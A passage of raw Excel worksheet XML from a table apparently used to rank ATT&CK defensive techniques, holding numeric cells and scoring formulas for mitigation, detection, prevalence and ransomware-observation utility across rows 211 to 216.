        <v>1</v>
      </c>
      <c r="G211" s="37">
        <v>1</v>
      </c>
      <c r="H211" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I211" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J211" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K211" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L211" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M211" s="37">
        <v>0</v>
      </c>
      <c r="N211" s="56">
        <v>0</v>
      </c>
      <c r="O211" s="56">
        <v>1</v>
      </c>
      <c r="P211" s="56">
        <v>0</v>
      </c>
      <c r="Q211" s="56">
        <v>0</v>
      </c>
      <c r="R211" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S211" s="57">
        <v>2</v>
      </c>
      <c r="T211" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U211" s="57">
        <v>7</v>
      </c>
      <c r="V211" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.0476000000000001E-2</v>
      </c>
      <c r="W211" s="37">
        <v>9</v>
      </c>
      <c r="X211" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y211" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z211" s="37">
        <v>1</v>
      </c>
      <c r="AA211" s="37">
        <v>0.01</v>
      </c>
      <c r="AB211" s="37">
        <v>0.01</v>
      </c>
      <c r="AC211" s="37"/>
      <c r="AD211" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE211" s="37" t="str" cm="1">
        <f t="array" ref="AE211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF211" s="37">
        <v>207</v>
      </c>
      <c r="AG211" s="37" t="str" cm="1">
        <f t="array" ref="AG211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD211)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH211" s="37">
        <v>207</v>
      </c>
      <c r="AI211" s="37" t="str" cm="1">
        <f t="array" ref="AI211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ211" s="37">
        <v>207</v>
      </c>
      <c r="AK211" s="37" t="str" cm="1">
        <f t="array" ref="AK211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL211" s="37">
        <v>207</v>
      </c>
      <c r="AM211" s="37" t="str" cm="1">
        <f t="array" ref="AM211">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD211)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN211" s="37">
        <v>0</v>
      </c>
      <c r="AO211" s="37">
        <v>1</v>
      </c>
      <c r="AP211" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ211" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>52.634868000000004</v>
      </c>
      <c r="AR211" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS211" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT211" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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1.2770206666666666</v>
      </c>
    </row>
    <row r="212" spans="1:47" ht="17">
      <c r="A212" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B212" s="37">
        <f t="shared" si="3"/>
        <v>154.69984133333332</v>
      </c>
      <c r="C212" s="37" t="s">
        <v>748</v>
      </c>
      <c r="D212" s="50" t="s">
        <v>745</v>
      </c>
      <c r="E212" s="37" t="s">
        <v>749</v>
      </c>
      <c r="F212" s="37">
        <v>1</v>
      </c>
      <c r="G212" s="37">
        <v>1</v>
      </c>
      <c r="H212" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I212" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J212" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K212" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L212" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M212" s="37">
        <v>0</v>
      </c>
      <c r="N212" s="56">
        <v>0</v>
      </c>
      <c r="O212" s="56">
        <v>0</v>
      </c>
      <c r="P212" s="56">
        <v>0</v>
      </c>
      <c r="Q212" s="56">
        <v>0</v>
      </c>
      <c r="R212" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S212" s="57">
        <v>2</v>
      </c>
      <c r="T212" s="57" t="s">
        <v>74</v>
      </c>
      <c r="U212" s="57">
        <v>7</v>
      </c>
      <c r="V212" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W212" s="37">
        <v>9</v>
      </c>
      <c r="X212" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y212" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z212" s="37">
        <v>0</v>
      </c>
      <c r="AA212" s="37">
        <v>0</v>
      </c>
      <c r="AB212" s="37">
        <v>0</v>
      </c>
      <c r="AC212" s="37"/>
      <c r="AD212" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE212" s="37" t="str" cm="1">
        <f t="array" ref="AE212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF212" s="37">
        <v>208</v>
      </c>
      <c r="AG212" s="37" t="str" cm="1">
        <f t="array" ref="AG212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD212)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH212" s="37">
        <v>208</v>
      </c>
      <c r="AI212" s="37" t="str" cm="1">
        <f t="array" ref="AI212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ212" s="37">
        <v>208</v>
      </c>
      <c r="AK212" s="37" t="str" cm="1">
        <f t="array" ref="AK212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL212" s="37">
        <v>208</v>
      </c>
      <c r="AM212" s="37" t="str" cm="1">
        <f t="array" ref="AM212">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD212)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN212" s="37">
        <v>0</v>
      </c>
      <c r="AO212" s="37">
        <v>0</v>
      </c>
      <c r="AP212" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ212" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.566613777777775</v>
      </c>
      <c r="AR212" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS212" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT212" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU21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13" spans="1:47" ht="85">
      <c r="A213" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B213" s="37">
        <f t="shared" si="3"/>
        <v>442.41432557142855</v>
      </c>
      <c r="C213" s="37" t="s">
        <v>750</v>
      </c>
      <c r="D213" s="50" t="s">
        <v>751</v>
      </c>
      <c r="E213" s="37"/>
      <c r="F213" s="37">
        <v>1</v>
      </c>
      <c r="G213" s="37">
        <v>1</v>
      </c>
      <c r="H213" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I213" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J213" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K213" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L213" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M213" s="37">
        <v>0</v>
      </c>
      <c r="N213" s="56">
        <v>0</v>
      </c>
      <c r="O213" s="56">
        <v>7</v>
      </c>
      <c r="P213" s="56">
        <v>5</v>
      </c>
      <c r="Q213" s="56">
        <v>0</v>
      </c>
      <c r="R213" s="57" t="s">
        <v>752</v>
      </c>
      <c r="S213" s="57">
        <v>21</v>
      </c>
      <c r="T213" s="57" t="s">
        <v>753</v>
      </c>
      <c r="U213" s="57">
        <v>18</v>
      </c>
      <c r="V213" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.4285714761904762</v>
      </c>
      <c r="W213" s="37">
        <v>39</v>
      </c>
      <c r="X213" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Y213" s="37">
        <v>0.70909100000000003</v>
      </c>
      <c r="Z213" s="37">
        <v>12</v>
      </c>
      <c r="AA213" s="37">
        <v>0.12</v>
      </c>
      <c r="AB213" s="37">
        <v>0.12</v>
      </c>
      <c r="AC213" s="37"/>
      <c r="AD213" s="50" t="s">
        <v>754</v>
      </c>
      <c r="AE213" s="37" t="str" cm="1">
        <f t="array" ref="AE213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF213" s="37">
        <v>209</v>
      </c>
      <c r="AG213" s="37" t="str" cm="1">
        <f t="array" ref="AG213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD213)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH213" s="37">
        <v>209</v>
      </c>
      <c r="AI213" s="37" t="str" cm="1">
        <f t="array" ref="AI213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD213)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ213" s="37">
        <v>209</v>
      </c>
      <c r="AK213" s="37" t="str" cm="1">
        <f t="array" ref="AK213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL213" s="37">
        <v>209</v>
      </c>
      <c r="AM213" s="37" t="str" cm="1">
        <f t="array" ref="AM213">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD213)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN213" s="37">
        <v>0</v>
      </c>
      <c r="AO213" s="37">
        <v>1</v>
      </c>
      <c r="AP213" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ213" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>147.47144185714285</v>
      </c>
      <c r="AR213" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS213" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT213" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU21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3.5350343299319724</v>
      </c>
    </row>
    <row r="214" spans="1:47" ht="68">
      <c r="A214" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B214" s="37">
        <f t="shared" si="3"/>
        <v>350.69235447619053</v>
      </c>
      <c r="C214" s="37" t="s">
        <v>755</v>
      </c>
      <c r="D214" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E214" s="37"/>
      <c r="F214" s="37">
        <v>2</v>
      </c>
      <c r="G214" s="37">
        <v>2</v>
      </c>
      <c r="H214" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I214" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J214" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K214" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L214" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M214" s="37">
        <v>2.709E-3</v>
      </c>
      <c r="N214" s="56">
        <v>0</v>
      </c>
      <c r="O214" s="56">
        <v>0</v>
      </c>
      <c r="P214" s="56">
        <v>12</v>
      </c>
      <c r="Q214" s="56">
        <v>5</v>
      </c>
      <c r="R214" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S214" s="57">
        <v>7</v>
      </c>
      <c r="T214" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U214" s="57">
        <v>7</v>
      </c>
      <c r="V214" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428547619047622</v>
      </c>
      <c r="W214" s="37">
        <v>14</v>
      </c>
      <c r="X214" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y214" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z214" s="37">
        <v>17</v>
      </c>
      <c r="AA214" s="37">
        <v>0.17</v>
      </c>
      <c r="AB214" s="37">
        <v>0.17</v>
      </c>
      <c r="AC214" s="37"/>
      <c r="AD214" s="50" t="s">
        <v>758</v>
      </c>
      <c r="AE214" s="37" t="str" cm="1">
        <f t="array" ref="AE214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD214)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF214" s="37">
        <v>210</v>
      </c>
      <c r="AG214" s="37" t="str" cm="1">
        <f t="array" ref="AG214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH214" s="37">
        <v>210</v>
      </c>
      <c r="AI214" s="37" t="str" cm="1">
        <f t="array" ref="AI214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD214)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ214" s="37">
        <v>210</v>
      </c>
      <c r="AK214" s="37" t="str" cm="1">
        <f t="array" ref="AK214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL214" s="37">
        <v>210</v>
      </c>
      <c r="AM214" s="37" t="str" cm="1">
        <f t="array" ref="AM214">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD214)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN214" s="37">
        <v>0</v>
      </c>
      <c r="AO214" s="37">
        <v>3</v>
      </c>
      <c r="AP214" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ214" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>116.89745149206351</v>
      </c>
      <c r="AR214" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS214" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT214" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU21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8.4212465351473931</v>
      </c>
    </row>
    <row r="215" spans="1:47" ht="34">
      <c r="A215" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B215" s="37">
        <f t="shared" si="3"/>
        <v>241.42837023809523</v>
      </c>
      <c r="C215" s="37" t="s">
        <v>759</v>
      </c>
      <c r="D215" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E215" s="37" t="s">
        <v>760</v>
      </c>
      <c r="F215" s="37">
        <v>1</v>
      </c>
      <c r="G215" s="37">
        <v>1</v>
      </c>
      <c r="H215" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I215" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J215" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K215" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L215" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M215" s="37">
        <v>0</v>
      </c>
      <c r="N215" s="56">
        <v>0</v>
      </c>
      <c r="O215" s="56">
        <v>7</v>
      </c>
      <c r="P215" s="56">
        <v>1</v>
      </c>
      <c r="Q215" s="56">
        <v>3</v>
      </c>
      <c r="R215" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S215" s="57">
        <v>7</v>
      </c>
      <c r="T215" s="57" t="s">
        <v>422</v>
      </c>
      <c r="U215" s="57">
        <v>7</v>
      </c>
      <c r="V215" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571404761904764</v>
      </c>
      <c r="W215" s="37">
        <v>14</v>
      </c>
      <c r="X215" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y215" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z215" s="37">
        <v>11</v>
      </c>
      <c r="AA215" s="37">
        <v>0.11</v>
      </c>
      <c r="AB215" s="37">
        <v>0.11</v>
      </c>
      <c r="AC215" s="37"/>
      <c r="AD215" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE215" s="37" t="str" cm="1">
        <f t="array" ref="AE215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD215)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF215" s="37">
        <v>211</v>
      </c>
      <c r="AG215" s="37" t="str" cm="1">
        <f t="array" ref="AG215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH215" s="37">
        <v>211</v>
      </c>
      <c r="AI215" s="37" t="str" cm="1">
        <f t="array" ref="AI215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ215" s="37">
        <v>211</v>
      </c>
      <c r="AK215" s="37" t="str" cm="1">
        <f t="array" ref="AK215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL215" s="37">
        <v>211</v>
      </c>
      <c r="AM215" s="37" t="str" cm="1">
        <f t="array" ref="AM215">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD215)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN215" s="37">
        <v>0</v>
      </c>
      <c r="AO215" s="37">
        <v>2</v>
      </c>
      <c r="AP215" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ215" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>80.476123412698414</v>
      </c>
      <c r="AR215" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS215" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT215" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU21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3.8798154006046857</v>
      </c>
    </row>
    <row r="216" spans="1:47" ht="34">
      <c r="A216" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B216" s="37">
        <f t="shared" si="3"/>
        <v>234.48551214285717</v>
      </c>
      <c r="C216" s="37" t="s">
        <v>761</v>
      </c>
      <c r="D216" s="50" t="s">
        <v>756</v>
      </c>
      <c r="E216" s="37" t="s">
        <v>762</v>
      </c>
      <c r="F216" s="37">
        <v>1</v>
      </c>
      <c r="G216" s="37">
        <v>1</v>
      </c>
      <c r="H216" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I216" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J216" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K216" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L216" s="37">
